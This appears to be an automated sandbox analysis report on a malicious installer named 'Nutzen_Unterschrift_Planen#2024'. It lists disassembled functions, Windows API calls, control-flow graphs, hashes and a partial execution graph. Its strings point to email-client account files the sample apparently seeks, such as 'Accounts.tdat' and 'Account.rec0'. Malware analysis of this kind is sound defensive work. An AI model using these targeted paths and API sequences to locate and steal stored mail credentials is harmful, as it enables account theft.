                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D1B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 36F71D37
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D4B
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D58
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D72
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D7D
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36F71D8A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                            • String ID:
                                                            • API String ID: 1454806937-0
                                                            • Opcode ID: f408d6434755c998bc3fcc9a54a8b05ca5cf8a4f4cae38bb3cf1ac4456104e40
                                                            • Instruction ID: 26f152c3c6e5a340221c965e9a6941afa02edc77dcae15f6d4fc410598ed3f77
                                                            • Opcode Fuzzy Hash: f408d6434755c998bc3fcc9a54a8b05ca5cf8a4f4cae38bb3cf1ac4456104e40
                                                            • Instruction Fuzzy Hash: FF21337194121CBFE710DBA08C8CEEB7BADEF083D4F441966F611E2144D6709E468BB5
                                                            Function 36F739BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 252 36f739be-36f739c8 253 36f73a6e-36f73a71 252->253 254 36f73a77 253->254 255 36f739cd-36f739dd 253->255 258 36f73a79-36f73a7d 254->258 256 36f739df-36f739e2 255->256 257 36f739ea-36f73a03 LoadLibraryExW 255->257 259 36f73a6b 256->259 260 36f739e8 256->260 261 36f73a55-36f73a5e 257->261 262 36f73a05-36f73a0e GetLastError 257->262 259->253 263 36f73a67-36f73a69 260->263 261->263 264 36f73a60-36f73a61 FreeLibrary 261->264 265 36f73a45 262->265 266 36f73a10-36f73a22 call 36f755f6 262->266 263->259 267 36f73a7e-36f73a80 263->267 264->263 269 36f73a47-36f73a49 265->269 266->265 272 36f73a24-36f73a36 call 36f755f6 266->272 267->258 269->261 270 36f73a4b-36f73a53 269->270 270->259 272->265 275 36f73a38-36f73a43 LoadLibraryExW 272->275 275->269
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 0-537541572
                                                            • Opcode ID: b298c8964a22950eff8504b82d9d8112dec908e6b4464f58af16e44342c4a190
                                                            • Instruction ID: 0965824a09675d65b20a6273e8d49229f09e6870e149f3fe99e971aa22420f5c
                                                            • Opcode Fuzzy Hash: b298c8964a22950eff8504b82d9d8112dec908e6b4464f58af16e44342c4a190
                                                            • Instruction Fuzzy Hash: 6811A5BBE01721FBFF119A798C86A1A3769AF05BE4F510912ED15B7284EA30D901C6E1
                                                            Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 276 4065c9-4065e9 GetSystemDirectoryW 277 4065eb 276->277 278 4065ed-4065ef 276->278 277->278 279 406600-406602 278->279 280 4065f1-4065fa 278->280 282 406603-406636 wsprintfW LoadLibraryExW 279->282 280->279 281 4065fc-4065fe 280->281 281->282
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                            • wsprintfW.USER32 ref: 0040661B
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925
                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                            • Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                            • Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8
                                                            Function 36F71000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 36F71038
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 36F7104B
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 36F71061
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 36F71075
                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 36F71090
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 36F710B8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                            • String ID:
                                                            • API String ID: 3594823470-0
                                                            • Opcode ID: c70ceaaa5e92df10964981442c2c75c19d503297301f790d5af453e67ba0dc0d
                                                            • Instruction ID: 947542cc559af9e8219f397fc1c753d036938448be637178749d030a8b8a467f
                                                            • Opcode Fuzzy Hash: c70ceaaa5e92df10964981442c2c75c19d503297301f790d5af453e67ba0dc0d
                                                            • Instruction Fuzzy Hash: D921D13590031C9BCF10EA60DC48ECB3B29EF443A4F145A97E959A31A5DE30DA9ECB81
                                                            Function 36F711EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 36F71E89: lstrlenW.KERNEL32(?,?,?,?,?,36F710DF,?,?,?,00000000), ref: 36F71E9A
                                                              • Part of subcall function 36F71E89: lstrcatW.KERNEL32(?,?,?,36F710DF,?,?,?,00000000), ref: 36F71EAC
                                                              • Part of subcall function 36F71E89: lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EB3
                                                              • Part of subcall function 36F71E89: lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EC8
                                                              • Part of subcall function 36F71E89: lstrcatW.KERNEL32(?,36F710DF,?,36F710DF,?,?,?,00000000), ref: 36F71ED3
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 36F7122A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat$AttributesFile
                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                            • API String ID: 1475205934-1520055953
                                                            • Opcode ID: 67c3429f9d803b076294ee1dc39b220eed31546548c23c61215ce9df7d060cd1
                                                            • Instruction ID: 30839a28c9ecbffe9b6e6099ce9dde3be8817449133f4a06e54924f0975da92f
                                                            • Opcode Fuzzy Hash: 67c3429f9d803b076294ee1dc39b220eed31546548c23c61215ce9df7d060cd1
                                                            • Instruction Fuzzy Hash: EB21A2B9E102086AEB10E7A0EC81FEE7739EF80754F101956F604EB2D0E6B1AD85C759
                                                            Function 004064F3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 323 4064f3-4064fe 324 406500-406505 323->324 325 406518-40651c 323->325 324->325 328 406507-40650c 324->328 326 40652b-406535 325->326 327 40651e-406526 call 405ba7 325->327 330 406577 326->330 331 406537-406538 326->331 327->326 339 406528 327->339 328->325 332 40650e-406513 328->332 333 40657b-40658c CharPrevW 330->333 335 40653e-406542 331->335 332->325 336 406515 332->336 337 406594-40659a 333->337 338 40658e-406592 333->338 340 406544-406553 call 405b5d 335->340 341 406569-406574 CharNextW 335->341 336->325 337->333 342 40659c-40659f 337->342 338->337 338->342 339->326 340->341 346 406555-406567 CharNextW call 405d0c CharNextW 340->346 341->335 344 406576 341->344 344->330 346->341
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                                            • CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                                            • CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,0040332B,007B5800,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":
                                                            • API String ID: 589700163-165019052
                                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                            • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                            • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
                                                            Function 36F74B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 349 36f74b39-36f74b61 GetModuleHandleExW 350 36f74b86-36f74b8a 349->350 351 36f74b63-36f74b76 GetProcAddress 349->351 352 36f74b95-36f74ba2 call 36f72ada 350->352 353 36f74b8c-36f74b8f FreeLibrary 350->353 354 36f74b85 351->354 355 36f74b78-36f74b83 351->355 353->352 354->350 355->354
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,36F74AEA,?,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000), ref: 36F74B59
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 36F74B6C
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,36F74AEA,?,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000,00000001,36F72082), ref: 36F74B8F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 90692abbb6761e1675248e516970b3b4372af04ab5100a68b95dde11ec4611f3
                                                            • Instruction ID: a4b71e361db89a89884a6f906df609ef833455640c4c362dc5b22399c5667310
                                                            • Opcode Fuzzy Hash: 90692abbb6761e1675248e516970b3b4372af04ab5100a68b95dde11ec4611f3
                                                            • Instruction Fuzzy Hash: 4FF04F75900108BFDB119FA5CC08FADBFBAEF44391F8041A5E905B6154DB34A952CAD2
                                                            Function 36F79492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,36F79C07,?,00000000,?,00000000,00000000), ref: 36F794D4
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 36F79590
                                                            • WriteFile.KERNEL32(?,?,00000000,36F79C07,00000000,?,?,?,?,?,?,?,?,?,36F79C07,?), ref: 36F795AF
                                                            • WriteFile.KERNEL32(?,?,00000001,36F79C07,00000000,?,?,?,?,?,?,?,?,?,36F79C07,?), ref: 36F795E8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 977765425-0
                                                            • Opcode ID: 62b8f8a2ec5897815effbb8f66319868994e308881221878c58390da8c2adb57
                                                            • Instruction ID: 2a974d2b219c9bf1010beea5e21fb894e95dfc9c0a4014248e622b05684d62f0
                                                            • Opcode Fuzzy Hash: 62b8f8a2ec5897815effbb8f66319868994e308881221878c58390da8c2adb57
                                                            • Instruction Fuzzy Hash: 8C51D2B1D00209AFDB00CFA8DC95AEEBBF9EF09350F10455FE955E7291D6709A41CBA1
                                                            Function 36F71E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,36F710DF,?,?,?,00000000), ref: 36F71E9A
                                                            • lstrcatW.KERNEL32(?,?,?,36F710DF,?,?,?,00000000), ref: 36F71EAC
                                                            • lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EB3
                                                            • lstrlenW.KERNEL32(?,?,36F710DF,?,?,?,00000000), ref: 36F71EC8
                                                            • lstrcatW.KERNEL32(?,36F710DF,?,36F710DF,?,?,?,00000000), ref: 36F71ED3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat
                                                            • String ID:
                                                            • API String ID: 493641738-0
                                                            • Opcode ID: a2e7e69da4c31ab2fe5f5bb7ce23f287ef46e0272490f7e540794f835def470f
                                                            • Instruction ID: da80d7ba7238a337c3083743c99530e37a43801767053339bd5379621562a8da
                                                            • Opcode Fuzzy Hash: a2e7e69da4c31ab2fe5f5bb7ce23f287ef46e0272490f7e540794f835def470f
                                                            • Instruction Fuzzy Hash: D4F089265001147BD621772AAC85E7F7B7CFFC5BA1F44141AF60893194DB54684392F6
                                                            Function 36F715DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,36F7190E,?,?,00000000,?,00000000), ref: 36F71643
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,36F7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 36F7165A
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,36F7190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 36F71661
                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,36F7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 36F71686
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1475610065-0
                                                            • Opcode ID: f7b5829f7fc41b27130f90da53324d9b008f4cc46272107b48508bd08aa6b253
                                                            • Instruction ID: 6d23b10885551d8a12c84f72e05781b74945f419e3d9d6a20007ccee7bf4afb0
                                                            • Opcode Fuzzy Hash: f7b5829f7fc41b27130f90da53324d9b008f4cc46272107b48508bd08aa6b253
                                                            • Instruction Fuzzy Hash: 0E21DA36900204ABD704DF54DC84EEE7BB8EF88750F14442BEA04BB185DB34A64697B6
                                                            Function 36F77153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 36F7715C
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 36F7717F
                                                              • Part of subcall function 36F756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 36F75702
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 36F771A5
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 36F771C7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                            • String ID:
                                                            • API String ID: 1794362364-0
                                                            • Opcode ID: 00c3ca689407d7f652f633f90bf1e26639b61acaed67c150a5f0e26a0e4286e5
                                                            • Instruction ID: 5d0da170fcf5ace102730e34849a5e2b5a87096aa9032cdd05ce17b9e02cea4a
                                                            • Opcode Fuzzy Hash: 00c3ca689407d7f652f633f90bf1e26639b61acaed67c150a5f0e26a0e4286e5
                                                            • Instruction Fuzzy Hash: B50188B6A153157B27111AB75C5CD7B7B6EDEC2AE0350152BBD04D7244DEA08C02C2F1
                                                            Function 36F75CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,36F71D66,00000000,00000000,?,36F75C88,36F71D66,00000000,00000000,00000000,?,36F75E85,00000006,FlsSetValue), ref: 36F75D13
                                                            • GetLastError.KERNEL32(?,36F75C88,36F71D66,00000000,00000000,00000000,?,36F75E85,00000006,FlsSetValue,36F7E190,FlsSetValue,00000000,00000364,?,36F75BC8), ref: 36F75D1F
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,36F75C88,36F71D66,00000000,00000000,00000000,?,36F75E85,00000006,FlsSetValue,36F7E190,FlsSetValue,00000000), ref: 36F75D2D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 7341b746e81c8dd1443d55000e18fb216524b647fd743673bbf670496edd5b4d
                                                            • Instruction ID: 7dcb062c1b794c4b19e8cb488b98daa9c0cac7720bba0e8550fa162bca218dd2
                                                            • Opcode Fuzzy Hash: 7341b746e81c8dd1443d55000e18fb216524b647fd743673bbf670496edd5b4d
                                                            • Instruction Fuzzy Hash: E301473BA19332ABE3114A788C4CE66775BAF457F1B600E21FE09E7144DF20C802CAE4
                                                            Function 00405D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405D9E
                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040334E,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,75D53420,0040359C), ref: 00405DB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: nsa
                                                            • API String ID: 1716503409-2209301699
                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                            • Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                            • Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64

                                                            Execution Graph

                                                            Execution Coverage:6.8%
                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                            Signature Coverage:3.2%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:89
                                                            execution_graph 37582 44dea5 37583 44deb5 FreeLibrary 37582->37583 37584 44dec3 37582->37584 37583->37584 37585 4287c1 37586 4287d2 37585->37586 37589 429ac1 37585->37589 37590 428818 37586->37590 37591 42881f 37586->37591 37601 425711 37586->37601 37587 4259da 37648 416760 11 API calls 37587->37648 37600 425ad6 37589->37600 37655 415c56 11 API calls 37589->37655 37622 42013a 37590->37622 37650 420244 97 API calls 37591->37650 37593 4260dd 37649 424251 120 API calls 37593->37649 37596 4259c2 37596->37600 37642 415c56 11 API calls 37596->37642 37601->37587 37601->37589 37601->37596 37604 422aeb memset memcpy memcpy 37601->37604 37605 429a4d 37601->37605 37611 4260a1 37601->37611 37621 425a38 37601->37621 37638 4227f0 memset memcpy 37601->37638 37639 422b84 15 API calls 37601->37639 37640 422b5d memset memcpy memcpy 37601->37640 37641 422640 13 API calls 37601->37641 37643 4241fc 11 API calls 37601->37643 37644 42413a 90 API calls 37601->37644 37604->37601 37606 429a66 37605->37606 37607 429a9b 37605->37607 37651 415c56 11 API calls 37606->37651 37610 429a96 37607->37610 37653 416760 11 API calls 37607->37653 37654 424251 120 API calls 37610->37654 37647 415c56 11 API calls 37611->37647 37613 429a7a 37652 416760 11 API calls 37613->37652 37621->37596 37645 422640 13 API calls 37621->37645 37646 4226e0 12 API calls 37621->37646 37623 42014c 37622->37623 37626 420151 37622->37626 37665 41e466 97 API calls 37623->37665 37625 420162 37625->37601 37626->37625 37627 4201b3 37626->37627 37628 420229 37626->37628 37629 4201b8 37627->37629 37630 4201dc 37627->37630 37628->37625 37631 41fd5e 86 API calls 37628->37631 37656 41fbdb 37629->37656 37630->37625 37634 4201ff 37630->37634 37662 41fc4c 37630->37662 37631->37625 37634->37625 37637 42013a 97 API calls 37634->37637 37637->37625 37638->37601 37639->37601 37640->37601 37641->37601 37642->37587 37643->37601 37644->37601 37645->37621 37646->37621 37647->37587 37648->37593 37649->37600 37650->37601 37651->37613 37652->37610 37653->37610 37654->37589 37655->37587 37657 41fbf1 37656->37657 37658 41fbf8 37656->37658 37661 41fc39 37657->37661 37680 4446ce 11 API calls 37657->37680 37670 41ee26 37658->37670 37661->37625 37666 41fd5e 37661->37666 37663 41ee6b 86 API calls 37662->37663 37664 41fc5d 37663->37664 37664->37630 37665->37626 37667 41fd65 37666->37667 37668 41fdab 37667->37668 37669 41fbdb 86 API calls 37667->37669 37668->37625 37669->37667 37671 41ee41 37670->37671 37672 41ee32 37670->37672 37681 41edad 37671->37681 37684 4446ce 11 API calls 37672->37684 37675 41ee3c 37675->37657 37678 41ee58 37678->37675 37686 41ee6b 37678->37686 37680->37661 37690 41be52 37681->37690 37684->37675 37685 41eb85 11 API calls 37685->37678 37687 41ee70 37686->37687 37688 41ee78 37686->37688 37743 41bf99 86 API calls 37687->37743 37688->37675 37691 41be6f 37690->37691 37692 41be5f 37690->37692 37697 41be8c 37691->37697 37722 418c63 memset memset 37691->37722 37721 4446ce 11 API calls 37692->37721 37694 41be69 37694->37675 37694->37685 37697->37694 37698 41bf3a 37697->37698 37700 41bed1 37697->37700 37701 41bee7 37697->37701 37725 4446ce 11 API calls 37698->37725 37702 41bef0 37700->37702 37704 41bee2 37700->37704 37701->37694 37726 41a453 86 API calls 37701->37726 37702->37701 37703 41bf01 37702->37703 37705 41bf24 memset 37703->37705 37707 41bf14 37703->37707 37723 418a6d memset memcpy memset 37703->37723 37711 41ac13 37704->37711 37705->37694 37724 41a223 memset memcpy memset 37707->37724 37710 41bf20 37710->37705 37712 41ac52 